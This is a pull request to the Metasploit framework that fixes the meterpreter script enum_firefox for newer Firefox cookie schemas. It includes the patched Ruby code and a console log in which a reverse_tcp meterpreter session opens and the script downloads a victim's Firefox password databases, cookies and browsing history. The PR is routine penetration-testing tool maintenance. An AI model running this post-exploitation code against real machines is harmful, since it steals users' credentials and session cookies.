### PR TITLE
Fixed scripts/meterpreter/enum_firefox to work with firefox > 3.6.x

### DIFF
--- a/scripts/meterpreter/enum_firefox.rb
+++ b/scripts/meterpreter/enum_firefox.rb
@@ -162,18 +162,18 @@ def frfxdmp(usrnm)
 	ckfldr = ::File.join(@logs,"firefoxcookies_#{usrnm}")
 	::FileUtils.mkdir_p(ckfldr)
 	db = SQLite3::Database.new(cookiesdb)
+	db.results_as_hash = true
 	print_status("\tGetting Firefox Cookies for #{usrnm}")
 	db.execute("SELECT * FROM moz_cookies;" ) do |item|
-		# item['id', 'name', 'value', 'host', 'path', 'expiry', 'lastAccessed', 'isSecure', 'isHttpOnly']
-		fd = ::File.new(ckfldr + item[0].to_s + "_" + item[3].to_s + ".txt", "w+")
-		fd.puts "Name: " + item[1] + "\n"
-		fd.puts "Value: " + item[2].to_s + "\n"
-		fd.puts "Host: " + item[3] + "\n"
-		fd.puts "Path: " + item[4] + "\n"
-		fd.puts "Expiry: " + item[5].to_s + "\n"
-		fd.puts "lastAccessed: " + item[6].to_s + "\n"
-		fd.puts "isSecure: " + item[7].to_s + "\n"
-		fd.puts "isHttpOnly: " + item[8].to_s + "\n"
+		fd = ::File.new(ckfldr + ::File::Separator + item['id'].to_s + "_" + item['host'].to_s + ".txt", "w+")
+		fd.puts "Name: " + item['name'] + "\n"
+		fd.puts "Value: " + item['value'].to_s + "\n"
+		fd.puts "Host: " + item['host'] + "\n"
+		fd.puts "Path: " + item['path'] + "\n"
+		fd.puts "Expiry: " + item['expiry'].to_s + "\n"
+		fd.puts "lastAccessed: " + item['lastAccessed'].to_s + "\n"
+		fd.puts "isSecure: " + item['isSecure'].to_s + "\n"
+		fd.puts "isHttpOnly: " + item['isHttpOnly'].to_s + "\n"
 		fd.close
 	end
 	return results


### PR DESCRIPTION
Script raised error and extract wrong information when firefox > 3.6.x installed on victim machine.

How to reproduce:
1. Install last firefox on victim machine.
2. Edit cookies.sqlite in profile directory, change value of "value" filed to something contain "/" symbol , for example "1234/5678" without quotes.
3. Run enum_firefox script.

Example:

```

[gregory@mbp:~/Documents/open_source/msf-my(master)]$ ./msfconsole -q
msf > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LPORT 4444 
LPORT => 4444
msf  exploit(handler) > set LHOST 192.168.0.163
LHOST => 192.168.0.163
msf  exploit(handler) > exploit 

[*] Started reverse handler on 192.168.0.163:4444 
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.0.163
[*] Meterpreter session 1 opened (192.168.0.163:4444 -> 192.168.0.163:55569) at Sun Feb 26 16:15:15 +0200 2012

meterpreter > run enum_firefox
[*] Firefox was found on this system.
[*] Extracting Firefox data for user IE User
[*]     Downloading Firefox Password file to '/Users/gregory/.msf4/logs/scripts/enum_firefox/192.168.0.163_20120226.1523/IE Usercert8.db'
[*]     Downloading Firefox Password file to '/Users/gregory/.msf4/logs/scripts/enum_firefox/192.168.0.163_20120226.1523/IE Userkey3.db'
[*]     Downloading Firefox Password file to '/Users/gregory/.msf4/logs/scripts/enum_firefox/192.168.0.163_20120226.1523/IE Usersignons.sqlite'
[*]     Downloading Firefox Database file cookies.sqlite to '/Users/gregory/.msf4/logs/scripts/enum_firefox/192.168.0.163_20120226.1523/IE Usercookies.sqlite'
[*]     Downloading Firefox Database file formhistory.sqlite to '/Users/gregory/.msf4/logs/scripts/enum_firefox/192.168.0.163_20120226.1523/IE Userformhistory.sqlite'
[*]     Downloading Firefox Database file places.sqlite to '/Users/gregory/.msf4/logs/scripts/enum_firefox/192.168.0.163_20120226.1523/IE Userplaces.sqlite'
[*]     Downloading Firefox Database file search.sqlite to '/Users/gregory/.msf4/logs/scripts/enum_firefox/192.168.0.163_20120226.1523/IE Usersearch.sqlite'
[*]     Getting Firefox Bookmarks for IE User
[*]     Saving to /Users/gregory/.msf4/logs/scripts/enum_firefox/192.168.0.163_20120226.1523/IE User_bookmarks.txt
[*]     It appears that there are no bookmarks for this account
[*]     Getting list of Downloads using Firefox made by IE User
[*]     Saving Download list to /Users/gregory/.msf4/logs/scripts/enum_firefox/192.168.0.163_20120226.1523/IE User_download_list.txt
[*]     Getting Firefox URL History for IE User
[*]     Saving URL History to /Users/gregory/.msf4/logs/scripts/enum_firefox/192.168.0.163_20120226.1523/IE User_history.txt
[*]     Getting Firefox Form History for IE User
[*]     Saving Firefox Form History to /Users/gregory/.msf4/logs/scripts/enum_firefox/192.168.0.163_20120226.1523/IE User_form_history.txt
[*]     Getting Firefox Search History for IE User
[*]     Saving Firefox Search History to /Users/gregory/.msf4/logs/scripts/enum_firefox/192.168.0.163_20120226.1523/IE User_search_history.txt
[*]     Getting Firefox Cookies for IE User
[-] Error in script: Errno::ENOENT No such file or directory - /Users/gregory/.msf4/logs/scripts/enum_firefox/192.168.0.163_20120226.1523/firefoxcookies_IE User94_KJhMTsPQRsq/pupQjq9y6e16+2xpB+1pBnUQfEqlOy9XAxDz.txt
meterpreter > 

```

Bug occurs due to the fact that Mozilla changed schema for cookies.sqlite file in Firefox 4.0.0.

I dumped cookies.sqlite schema for all firefox version here: https://gist.github.com/1916610

Thanks.
